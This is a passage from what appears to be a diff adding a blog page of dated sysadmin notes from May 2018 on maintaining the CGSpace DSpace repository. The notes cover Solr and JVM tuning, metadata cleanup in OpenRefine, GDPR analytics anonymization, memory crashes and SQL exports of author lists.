+http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E
+http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
+
+
+Then I reduced the JVM heap size from 6144 back to 5120m
+Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "May, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-05/",
+  "wordCount": "3503",
+  "datePublished": "2018-05-01T16:43:54+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-05/">
+
+    <title>May, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-05/">May, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-05-01T16:43:54+03:00">Tue May 01, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-05-01">2018-05-01</h2>
+<ul>
+<li>I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+<ul>
+<li>http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E</li>
+<li>http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E</li>
+</ul>
+</li>
+<li>Then I reduced the JVM heap size from 6144 back to 5120m</li>
+<li>Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to support hosts choosing which distribution they want to use</li>
+</ul>
+<h2 id="2018-05-02">2018-05-02</h2>
+<ul>
+<li>Advise Fabio Fidanza about integrating CGSpace content in the new CGIAR corporate website</li>
+<li>I think they can mostly rely on using the <code>cg.contributor.crp</code> field</li>
+<li>Looking over some IITA records for Sisay
+<ul>
+<li>Other than trimming and collapsing consecutive whitespace, I made some other corrections</li>
+<li>I need to check the correct formatting of COTE D&rsquo;IVOIRE vs COTE D’IVOIRE</li>
+<li>I replaced all DOIs with HTTPS</li>
+<li>I checked a few DOIs and found at least one that was missing, so I Googled the title of the paper and found the correct DOI</li>
+<li>Also, I found an <a href="https://www.doi.org/factsheets/DOI_PURL.html">FAQ for DOI that says the <code>dx.doi.org</code> syntax is older</a>, so I will replace all the DOIs with <code>doi.org</code> instead</li>
+<li>I found five records with &ldquo;ISI Jounal&rdquo; instead of &ldquo;ISI Journal&rdquo;</li>
+<li>I found one item with IITA subject &ldquo;.&rdquo;</li>
+<li>Need to remember to check the facets for things like this in sponsorship:
+<ul>
+<li>Deutsche Gesellschaft für Internationale Zusammenarbeit</li>
+<li>Deutsche Gesellschaft fur Internationale Zusammenarbeit</li>
+</ul>
+</li>
+<li>Eight records with language &ldquo;fn&rdquo; instead of &ldquo;fr&rdquo;</li>
+<li>One incorrect type (lowercase &ldquo;proceedings&rdquo;): Conference proceedings</li>
+<li>Found some capitalized CRPs in <code>cg.contributor.crp</code></li>
+<li>Found some incorrect author affiliations, ie &ldquo;Institut de Recherche pour le Developpement Agricolc&rdquo; should be &ldquo;Institut de Recherche pour le Developpement <em>Agricole</em>&rdquo;</li>
+<li>Wow, and for sponsors there are the following:
+<ul>
+<li>Incorrect: Flemish Agency for Development Cooperation and Technical Assistance</li>
+<li>Incorrect: Flemish Organization for Development Cooperation and Technical Assistance</li>
+<li>Correct: Flemish <em>Association</em> for Development Cooperation and Technical Assistance</li>
+</ul>
+</li>
+<li>One item had region &ldquo;WEST&rdquo; (I corrected it to &ldquo;WEST AFRICA&rdquo;)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-05-03">2018-05-03</h2>
+<ul>
+<li>It turns out that the IITA records that I was helping Sisay with in March were imported in 2018-04 without a final check by Abenet or I</li>
+<li>There are lots of errors on language, CRP, and even some encoding errors on abstract fields</li>
+<li>I export them and include the hidden metadata fields like <code>dc.date.accessioned</code> so I can filter the ones from 2018-04 and correct them in Open Refine:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
+</code></pre><ul>
+<li>Abenet sent a list of 46 ORCID identifiers for ILRI authors so I need to get their names using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script and merge them into our controlled vocabulary</li>
+<li>On the messed up IITA records from 2018-04 I see sixty DOIs in incorrect format (cg.identifier.doi)</li>
+</ul>
+<h2 id="2018-05-06">2018-05-06</h2>
+<ul>
+<li>Fixing the IITA records from Sisay, sixty DOIs have completely invalid format like <code>http:dx.doi.org10.1016j.cropro.2008.07.003</code></li>
+<li>I corrected all the DOIs and then checked them for validity with a quick bash loop:</li>
+</ul>
+<pre tabindex="0"><code>$ for line in $(&lt; /tmp/links.txt); do echo $line; http --print h $line; done
+</code></pre><ul>
+<li>Most of the links are good, though one is duplicate and one seems to even be incorrect in the publisher&rsquo;s site so&hellip;</li>
+<li>Also, there are some duplicates:
+<ul>
+<li><code>10568/92241</code> and <code>10568/92230</code> (same DOI)</li>
+<li><code>10568/92151</code> and <code>10568/92150</code> (same ISBN)</li>
+<li><code>10568/92291</code> and <code>10568/92286</code> (same citation, title, authors, year)</li>
+</ul>
+</li>
+<li>Messed up abstracts:
+<ul>
+<li><code>10568/92309</code></li>
+</ul>
+</li>
+<li>Fixed some issues in regions, countries, sponsors, ISSN, and cleaned whitespace errors from citation, abstract, author, and titles</li>
+<li>Fixed all issues with CRPs</li>
+<li>A few more interesting Unicode characters to look for in text fields like author, abstracts, and citations  might be: <code>’</code> (0x2019), <code>·</code> (0x00b7), and <code>€</code> (0x20ac)</li>
+<li>A custom text facit in OpenRefine with this GREL expression could be a good for finding invalid characters or encoding errors in authors, abstracts, etc:</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/.*[(|)].*/)),
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b7.*/)),
+  isNotNull(value.match(/.*\u20ac.*/))
+)
+</code></pre><ul>
+<li>I found some more IITA records that Sisay imported on 2018-03-23 that have invalid CRP names, so now I kinda want to check those ones!</li>
+<li>Combine the ORCID identifiers Abenet sent with our existing list and resolve their names using the <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-05-06-combined.txt
+$ ./resolve-orcids.py -i /tmp/2018-05-06-combined.txt -o /tmp/2018-05-06-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>I made a pull request (<a href="https://github.com/ilri/DSpace/pull/373">#373</a>) for this that I&rsquo;ll merge some time next week (I&rsquo;m expecting Atmire to get back to us about DSpace 5.8 soon)</li>
+<li>After testing quickly I just decided to merge it, and I noticed that I don&rsquo;t even need to restart Tomcat for the changes to get loaded</li>
+</ul>
+<h2 id="2018-05-07">2018-05-07</h2>
+<ul>
+<li>I spent a bit of time playing with <a href="https://github.com/codeforkjeff/conciliator">conciliator</a> and Solr, trying to figure out how to reconcile columns in OpenRefine with data in our existing Solr cores (like CRP subjects)</li>
+<li>The documentation regarding the Solr stuff is limited, and I cannot figure out what all the fields in <code>conciliator.properties</code> are supposed to be</li>
+<li>But then I found <a href="https://github.com/okfn/reconcile-csv">reconcile-csv</a>, which allows you to reconcile against values in a CSV file!</li>
+<li>That, combined with splitting our multi-value fields on &ldquo;||&rdquo; in OpenRefine is amaaaaazing, because after reconciliation you can just join them again</li>
+<li>Oh wow, you can also facet on the individual values once you&rsquo;ve split them! That&rsquo;s going to be amazing for proofing CRPs, subjects, etc.</li>
+</ul>
+<h2 id="2018-05-09">2018-05-09</h2>
+<ul>
+<li>Udana asked about the Book Chapters we had been proofing on DSpace Test in 2018-04</li>
+<li>I told him that there were still some TODO items for him on that data, for example to update the <code>dc.language.iso</code> field for the Spanish items</li>
+<li>I was trying to remember how I parsed the <code>input-forms.xml</code> using <code>xmllint</code> to extract subjects neatly</li>
+<li>I could use it with <a href="https://github.com/okfn/reconcile-csv">reconcile-csv</a> or to populate a Solr instance for reconciliation</li>
+<li>This XPath expression gets close, but outputs all items on one line:</li>
+</ul>
+<pre tabindex="0"><code>$ xmllint --xpath &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/node()&#39; dspace/config/input-forms.xml        
+Agriculture for Nutrition and HealthBig DataClimate Change, Agriculture and Food SecurityExcellence in BreedingFishForests, Trees and AgroforestryGenebanksGrain Legumes and Dryland CerealsLivestockMaizePolicies, Institutions and MarketsRiceRoots, Tubers and BananasWater, Land and EcosystemsWheatAquatic Agricultural SystemsDryland CerealsDryland SystemsGrain LegumesIntegrated Systems for the Humid TropicsLivestock and Fish
+</code></pre><ul>
+<li>Maybe <code>xmlstarlet</code> is better:</li>
+</ul>
+<pre tabindex="0"><code>$ xmlstarlet sel -t -v &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/text()&#39; dspace/config/input-forms.xml
+Agriculture for Nutrition and Health
+Big Data
+Climate Change, Agriculture and Food Security
+Excellence in Breeding
+Fish
+Forests, Trees and Agroforestry
+Genebanks
+Grain Legumes and Dryland Cereals
+Livestock
+Maize
+Policies, Institutions and Markets
+Rice
+Roots, Tubers and Bananas
+Water, Land and Ecosystems
+Wheat
+Aquatic Agricultural Systems
+Dryland Cereals
+Dryland Systems
+Grain Legumes
+Integrated Systems for the Humid Tropics
+Livestock and Fish
+</code></pre><ul>
+<li>Discuss Colombian BNARS harvesting the CIAT data from CGSpace</li>
+<li>They are using a system called Primo and the only options for data harvesting in that system are via FTP and OAI</li>
+<li>I told them to get all <a href="https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=com_10568_35697">CIAT records via OAI</a></li>
+<li>Just a note to myself, I figured out how to get reconcile-csv to run from source rather than running the old pre-compiled JAR file:</li>
+</ul>
+<pre tabindex="0"><code>$ lein run /tmp/crps.csv name id
+</code></pre><ul>
+<li>I tried to reconcile against a CSV of our countries but reconcile-csv crashes</li>
+</ul>
+<h2 id="2018-05-13">2018-05-13</h2>
+<ul>
+<li>It turns out there was a space in my &ldquo;country&rdquo; header that was causing reconcile-csv to crash</li>
+<li>After removing that it works fine!</li>
+<li>Looking at Sisay&rsquo;s 2,640 CIFOR records on DSpace Test (<a href="https://dspacetest.cgiar.org/handle/10568/92904">10568/92904</a>)
+<ul>
+<li>Trimmed all leading / trailing white space and condensed multiple spaces into one</li>
+<li>Corrected DOIs to use HTTPS and &ldquo;doi.org&rdquo; instead of &ldquo;dx.doi.org&rdquo;
+<ul>
+<li>There are eight items in <code>cg.identifier.doi</code> that are not DOIs)</li>
+</ul>
+</li>
+<li>Corrected <code>cg.identifier.url</code> links to cifor.org to use HTTPS</li>
+<li>Corrected <code>dc.language.iso</code> from vt to vi (Vietnamese)</li>
+<li>Corrected affiliations to not use acronyms</li>
+<li>Reconcile countries against our countries list (removing terms like LATIN AMERICA, CENTRAL AFRICA, etc that are not countries)</li>
+<li>Reconcile regions against our list of regions</li>
+</ul>
+</li>
+</ul>
+<h2 id="2018-05-14">2018-05-14</h2>
+<ul>
+<li>Send a message to the OpenRefine mailing list about the bug with reconciling multi-value cells</li>
+<li>Help Silvia Alonso get a list of all her publications since 2013 from Listings and Reports</li>
+</ul>
+<h2 id="2018-05-15">2018-05-15</h2>
+<ul>
+<li>Turns out I was doing the OpenRefine reconciliation wrong: I needed to copy the matched values to a new column!</li>
+<li>Also, I learned how to do something cool with Jython expressions in OpenRefine</li>
+<li>This will fetch a URL and return its HTTP response code:</li>
+</ul>
+<pre tabindex="0"><code>import urllib2
+import re
+
+pattern = re.compile(&#39;.*10.1016.*&#39;)
+if pattern.match(value):
+  get = urllib2.urlopen(value)
+  return get.getcode()
+
+return &#34;blank&#34;
+</code></pre><ul>
+<li>I used a regex to limit it to just some of the DOIs in this case because there were thousands of URLs</li>
+<li>Here the response code would be 200, 404, etc, or &ldquo;blank&rdquo; if there is no URL for that item</li>
+<li>You could use this in a facet or in a new column</li>
+<li>More information and good examples here: <a href="https://programminghistorian.org/lessons/fetch-and-parse-data-with-openrefine">https://programminghistorian.org/lessons/fetch-and-parse-data-with-openrefine</a></li>
+<li>Finish looking at the 2,640 CIFOR records on DSpace Test (<a href="https://dspacetest.cgiar.org/handle/10568/92904">10568/92904</a>), cleaning up authors and adding collection mappings</li>
+<li>They can now be moved to CGSpace as far as I&rsquo;m concerned, but I don&rsquo;t know if Sisay will do it or me</li>
+<li>I was checking the CIFOR data for duplicates using Atmire&rsquo;s Metadata Quality Module (and found some duplicates actually), but then DSpace died&hellip;</li>
+<li>I didn&rsquo;t see anything in the Tomcat, DSpace, or Solr logs, but I saw this in <code>dmest -T</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Tue May 15 12:10:01 2018] Out of memory: Kill process 3763 (java) score 706 or sacrifice child
+[Tue May 15 12:10:01 2018] Killed process 3763 (java) total-vm:14667688kB, anon-rss:5705268kB, file-rss:0kB, shmem-rss:0kB
+[Tue May 15 12:10:01 2018] oom_reaper: reaped process 3763 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>So the Linux kernel killed Java&hellip;</li>
+<li>Maria from Bioversity mailed to say she got an error while submitting an item on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>Unable to load Submission Information, since WorkspaceID (ID:S96060) is not a valid in-process submission
+</code></pre><ul>
+<li>Looking in the DSpace log I see something related:</li>
+</ul>
+<pre tabindex="0"><code>2018-05-15 12:35:30,858 INFO  org.dspace.submit.step.CompleteStep @ m.garruccio@cgiar.org:session_id=8AC4499945F38B45EF7A1226E3042DAE:submission_complete:Completed submission with id=96060
+</code></pre><ul>
+<li>So I&rsquo;m not sure&hellip;</li>
+<li>I finally figured out how to get OpenRefine to reconcile values from Solr via <a href="https://github.com/codeforkjeff/conciliator">conciliator</a>:</li>
+<li>The trick was to use a more appropriate Solr fieldType <code>text_en</code> instead of <code>text_general</code> so that more terms match, for example uppercase and lower case:</li>
+</ul>
+<pre tabindex="0"><code>$ ./bin/solr start
+$ ./bin/solr create_core -c countries
+$ curl -X POST -H &#39;Content-type:application/json&#39; --data-binary &#39;{&#34;add-field&#34;: {&#34;name&#34;:&#34;country&#34;, &#34;type&#34;:&#34;text_en&#34;, &#34;multiValued&#34;:false, &#34;stored&#34;:true}}&#39; http://localhost:8983/solr/countries/schema
+$ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
+</code></pre><ul>
+<li>It still doesn&rsquo;t catch simple mistakes like &ldquo;ALBANI&rdquo; or &ldquo;AL BANIA&rdquo; for &ldquo;ALBANIA&rdquo;, and it doesn&rsquo;t return scores, so I have to select matches manually:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/05/openrefine-solr-conciliator.png" alt="OpenRefine reconciling countries from local Solr"></p>
+<ul>
+<li>I should probably make a general copy field and set it to be the default search field, like DSpace&rsquo;s search core does (see schema.xml):</li>
+</ul>
+<pre tabindex="0"><code>&lt;defaultSearchField&gt;search_text&lt;/defaultSearchField&gt;
+...
+&lt;copyField source=&#34;*&#34; dest=&#34;search_text&#34;/&gt;
+</code></pre><ul>
+<li>Actually, I wonder how much of their schema I could just copy&hellip;</li>
+<li>Apparently the default search field is the <code>df</code> parameter and you could technically just add it to the query string, so no need to bother with that in the schema now</li>
+<li>I copied over the DSpace <code>search_text</code> field type from the DSpace Solr config (had to remove some properties so Solr would start) but it doesn&rsquo;t seem to be any better at matching than the <code>text_en</code> type</li>
+<li>I think I need to focus on trying to return scores with conciliator</li>
+</ul>
+<h2 id="2018-05-16">2018-05-16</h2>
+<ul>
+<li>Discuss GDPR with James Stapleton
+<ul>
+<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store peoples&rsquo; names, emails, and phone numbers if they register</li>
+<li>We set cookies on the user&rsquo;s computer, but these do not contain personally identifiable information (PII) and they are &ldquo;session&rdquo; cookies which are deleted when the user closes their browser</li>
+<li>We use Google Analytics to track website usage, which makes Google the &ldquo;Data Processor&rdquo; and in this case we merely need to <em>limit</em> or <em>obfuscate</em> the information we send to them</li>
+<li>As the only personally identifiable information we send is the user&rsquo;s IP address, I think we only need to enable <a href="https://support.google.com/analytics/answer/2763052">IP Address Anonymization</a> in our <code>analytics.js</code> code snippets</li>
+<li>Then we can add a &ldquo;Privacy&rdquo; page to CGSpace that makes all of this clear</li>
+</ul>
+</li>
+<li>Silvia asked if I could sort the records in her Listings and Report output and it turns out that the options are misconfigured in <code>dspace/config/modules/atmire-listings-and-reports.cfg</code></li>
+<li>I created and merged a pull request to fix the sorting issue in Listings and Reports (<a href="https://github.com/ilri/DSpace/pull/374">#374</a>)</li>
+<li>Regarding the IP Address Anonymization for GDPR, I ammended the Google Analytics snippet in <code>page-structure-alterations.xsl</code> to:</li>
+</ul>
+<pre tabindex="0"><code>ga(&#39;send&#39;, &#39;pageview&#39;, {
+  &#39;anonymizeIp&#39;: true
+});
+</code></pre><ul>
+<li>I tested loading a certain page before and after adding this and afterwards I saw that the parameter <code>aip=1</code> was being sent with the analytics response to Google</li>
+<li>According to the <a href="https://developers.google.com/analytics/devguides/collection/analyticsjs/field-reference#anonymizeIp">analytics.js protocol parameter documentation</a> this means that IPs are being anonymized</li>
+<li>After finding and fixing some duplicates in IITA&rsquo;s <code>IITA_April_27</code> test collection on DSpace Test (10568/92703) I told Sisay that he can move them to IITA&rsquo;s Journal Articles collection on CGSpace</li>
+</ul>
+<h2 id="2018-05-17">2018-05-17</h2>
+<ul>
+<li>Testing reconciliation of countries against Solr via conciliator, I notice that <code>CÔTE D'IVOIRE</code> doesn&rsquo;t match <code>COTE D'IVOIRE</code>, whereas with reconcile-csv it does</li>
+<li>Also, when reconciling regions against Solr via conciliator <code>EASTERN AFRICA</code> doesn&rsquo;t match <code>EAST AFRICA</code>, whereas with reconcile-csv it does</li>
+<li>And <code>SOUTH AMERICA</code> matches both <code>SOUTH ASIA</code> and <code>SOUTH AMERICA</code> with the same match score of 2&hellip; WTF.</li>
+<li>It could be that I just need to tune the query filter in Solr (currently using the example <code>text_en</code> field type)</li>
+<li>Oh sweet, it turns out that the issue with searching for characters with accents is called &ldquo;code folding&rdquo; in Solr</li>
+<li>You can use either a <a href="https://lucene.apache.org/solr/guide/7_3/language-analysis.html"><code>solr.ASCIIFoldingFilterFactory</code> filter</a> or a <a href="https://lucene.apache.org/solr/guide/7_3/charfilterfactories.html"><code>solr.MappingCharFilterFactory</code> charFilter</a> mapping against <code>mapping-FoldToASCII.txt</code></li>
+<li>Also see: <a href="https://opensourceconnections.com/blog/2017/02/20/solr-utf8/">https://opensourceconnections.com/blog/2017/02/20/solr-utf8/</a></li>
+<li>Now <code>CÔTE D'IVOIRE</code> matches <code>COTE D'IVOIRE</code>!</li>
+<li>I&rsquo;m not sure which method is better, perhaps the <code>solr.ASCIIFoldingFilterFactory</code> filter because it doesn&rsquo;t require copying the <code>mapping-FoldToASCII.txt</code> file</li>
+<li>And actually I&rsquo;m not entirely sure about the order of filtering before tokenizing, etc&hellip;</li>
+<li>Ah, I see that <code>charFilter</code> must be before the tokenizer because it works on a stream, whereas <code>filter</code> operates on tokenized input so it must come after the tokenizer</li>
+<li>Regarding the use of the <code>charFilter</code> vs the <code>filter</code> class before and after the tokenizer, respectively, I think it&rsquo;s better to use the <code>charFilter</code> to normalize the input stream before tokenizing it as I have no idea what kinda stuff might get removed by the tokenizer</li>
+<li>Skype with Geoffrey from IITA in Nairobi who wants to deposit records to CGSpace via the REST API but I told him that this skips the submission workflows and because we cannot guarantee the data quality we would not allow anyone to use it this way</li>
+<li>I finished making the XMLUI changes for anonymization of IP addresses in Google Analytics and merged the changes to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/375">#375</a></li>
+<li>Also, I think we might be able to implement <a href="https://developers.google.com/analytics/devguides/collection/analyticsjs/user-opt-out">opt-out functionality for Google Analytics using a window property</a> that could be managed by <a href="https://webgilde.com/en/analytics-opt-out/">storing its status in a cookie</a></li>
+<li>This cookie could be set by a user clicking a link in a privacy policy, for example</li>
+<li>The additional Javascript could be easily added to our existing <code>googleAnalytics</code> template in each XMLUI theme</li>
+</ul>
+<h2 id="2018-05-18">2018-05-18</h2>
+<ul>
+<li>Do a final check on the thirty (30) IWMI Book Chapters for Udana and upload them to CGSpace</li>
+<li>These were previously on <a href="https://dspacetest.cgiar.org/handle/10568/91679">DSpace Test as &ldquo;IWMI test collection&rdquo;</a> in 2018-04</li>
+</ul>
+<h2 id="2018-05-20">2018-05-20</h2>
+<ul>
+<li>Run all system updates on DSpace Test (linode19), re-deploy DSpace with latest <code>5_x-dev</code> branch (including GDPR IP anonymization), and reboot the server</li>
+<li>Run all system updates on CGSpace (linode18), re-deploy DSpace with latest <code>5_x-dev</code> branch (including GDPR IP anonymization), and reboot the server</li>
+</ul>
+<h2 id="2018-05-21">2018-05-21</h2>
+<ul>
+<li>Geoffrey from IITA got back with more questions about depositing items programatically into the CGSpace workflow</li>
+<li>I pointed out that <a href="http://swordapp.org/">SWORD</a> might be an option, as <a href="https://wiki.lyrasis.org/display/DSDOC5x/SWORDv2+Server">DSpace supports the SWORDv2 protocol</a> (although we have never tested it)</li>
+<li>Work on implementing <a href="https://cookieconsent.insites.com">cookie consent</a> popup for all XMLUI themes (SASS theme with primary / secondary branding from Bootstrap)</li>
+</ul>
+<h2 id="2018-05-22">2018-05-22</h2>
+<ul>
+<li>Skype with James Stapleton about last minute GDPR wording</li>
+<li>After spending yesterday working on integration and theming of the cookieconsent popup, today I cannot get the damn &ldquo;Agree&rdquo; button to dismiss the popup!</li>
+<li>I tried calling it several ways, via jQuery, via a function in <code>page-structure-alterations.xsl</code>, via script tags in <code>&lt;head&gt;</code> in <code>page-structure.xsl</code>, and a few others</li>
+<li>The only way it actually works is if I paste it into the community or collection HTML</li>
+<li>Oh, actually in testing it appears this is not true</li>
+<li>This is a waste of TWO full days of work</li>
+<li>Marissa Van Epp asked if I could add <code>PII-FP1_PACCA2</code> to the CCAFS phase II project tags on CGSpace so I created a ticket to track it (<a href="https://github.com/ilri/DSpace/issues/376">#376</a>)</li>
+</ul>
+<h2 id="2018-05-23">2018-05-23</h2>
+<ul>
+<li>I&rsquo;m investigating how many non-CGIAR users we have registered on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select email, netid from eperson where email not like &#39;%cgiar.org%&#39; and email like &#39;%@%&#39;;
+</code></pre><ul>
+<li>We might need to do something regarding these users for GDPR compliance because we have their names, emails, and potentially phone numbers</li>
+<li>I decided that I will just use the cookieconsent script as is, since it looks good and technically does set the cookie with &ldquo;allow&rdquo; or &ldquo;dismiss&rdquo;</li>
+<li>I wrote a quick conditional to check if the user has agreed or not before enabling Google Analytics</li>
+<li>I made a pull request for the GDPR compliance popup (<a href="https://github.com/ilri/DSpace/pull/377">#377</a>) and merged it to the <code>5_x-prod</code> branch</li>
+<li>I will deploy it to CGSpace tonight</li>
+</ul>
+<h2 id="2018-05-28">2018-05-28</h2>
+<ul>
+<li>Daniel Haile-Michael sent a message that CGSpace was down (I am currently in Oregon so the time difference is ~10 hours)</li>
+<li>I looked in the logs but didn&rsquo;t see anything that would be the cause of the crash</li>
+<li>Atmire finalized the DSpace 5.8 testing and sent a pull request: <a href="https://github.com/ilri/DSpace/pull/378">https://github.com/ilri/DSpace/pull/378</a></li>
+<li>They have asked if I can test this and get back to them by June 11th</li>
+</ul>
+<h2 id="2018-05-30">2018-05-30</h2>
+<ul>
+<li>Talk to Samantha from Bioversity about something related to Google Analytics, I&rsquo;m still not sure what they want</li>
+<li>DSpace Test crashed last night, seems to be related to system memory (not JVM heap)</li>
+<li>I see this in <code>dmesg</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Wed May 30 00:00:39 2018] Out of memory: Kill process 6082 (java) score 697 or sacrifice child
+[Wed May 30 00:00:39 2018] Killed process 6082 (java) total-vm:14876264kB, anon-rss:5683372kB, file-rss:0kB, shmem-rss:0kB
+[Wed May 30 00:00:40 2018] oom_reaper: reaped process 6082 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>I need to check the Tomcat JVM heap size/usage, command line JVM heap size (for cron jobs), and PostgreSQL memory usage</li>
+<li>It might be possible to adjust some things, but eventually we&rsquo;ll need a larger VPS instance</li>
+<li>For some reason there are no JVM stats in Munin, ugh</li>
+<li>Run all system updates on DSpace Test and reboot it</li>
+<li>I generated a list of CIFOR duplicates from the <code>CIFOR_May_9</code> collection using the Atmire MQM module and then dumped the HTML source so I could process it for sending to Vika</li>
+<li>I used grep to filter all relevant handle lines from the HTML source then used sed to insert a newline before each &ldquo;Item1&rdquo; line (as the duplicates are grouped like Item1, Item2, Item3 for each set of duplicates):</li>
+</ul>
+<pre tabindex="0"><code>$ grep -E &#39;aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item&#39; ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
+$ sed &#39;s/.*Item1.*/\n&amp;/g&#39; ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
+</code></pre><ul>
+<li>I told Vika to look through the list manually and indicate which ones are indeed duplicates that we should delete, and which ones to map to CIFOR&rsquo;s collection</li>
+<li>A few weeks ago Peter wanted a list of authors from the ILRI collections, so I need to find a way to get the handles of all those collections</li>
+<li>I can use the <code>/communities/{id}/collections</code> endpoint of the REST API but it only takes IDs (not handles) and doesn&rsquo;t seem to descend into sub communities</li>
+<li>Shit, so I need the IDs for the the top-level ILRI community and all its sub communities (and their sub communities)</li>
+<li>There has got to be a better way to do this than going to each community and getting their handles and IDs manually</li>
+<li>Oh shit, I literally already wrote a script to get all collections in a community hierarchy from the REST API: <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a></li>
+<li>The output isn&rsquo;t great, but all the handles and IDs are printed in debug mode:</li>
+</ul>
+<pre tabindex="0"><code>$ ./rest-find-collections.py -u https://cgspace.cgiar.org/rest -d 10568/1 2&gt; /tmp/ilri-collections.txt
+</code></pre><ul>
+<li>Then I format the list of handles and put it into this SQL query to export authors from items ONLY in those collections (too many to list here):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/67236&#39;,&#39;10568/67274&#39;,...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
+</code></pre><h2 id="2018-05-31">2018-05-31</h2>
+<ul>
+<li>Clarify CGSpace&rsquo;s usage of Google Analytics and personally identifiable information during user registration for Bioversity team who had been asking about GDPR compliance</li>
+<li>Testing running PostgreSQL in a Docker container on localhost because when I&rsquo;m on Arch Linux there isn&rsquo;t an easily installable package for particular PostgreSQL versions</li>
+<li>Now I can just use Docker:</li>
